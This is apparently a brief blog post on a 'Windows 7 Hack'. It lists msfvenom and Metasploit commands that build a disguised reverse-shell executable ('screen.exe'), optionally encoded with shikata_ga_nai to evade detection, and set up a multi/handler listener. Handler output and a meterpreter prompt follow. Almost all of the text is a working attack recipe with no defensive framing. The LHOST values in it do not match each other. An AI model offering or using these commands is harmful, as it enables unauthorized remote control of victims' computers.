MSFVenom Reverse TCP | To create payload | Windows 7 Hack

Windows 7 Hacks

root@kali:~#msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.205.129 LPORT=6666 -f exe > screen.exe

if no arch selected error
-a x86 --platform Windows -e x86/shikata_ga_nai
-a x64

root@kali:~# msfconsole
msf> Use exploit/multi/handler
msf  exploit(handler) > set LHOST 192.168.1.4   (Attacker ip)
LHOST => 192.168.1.4
msf  exploit(handler) > set LPORT 6666(Attacker port)
LPORT => 6666

 msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...

meterpreter> cd c:/         

Reactions: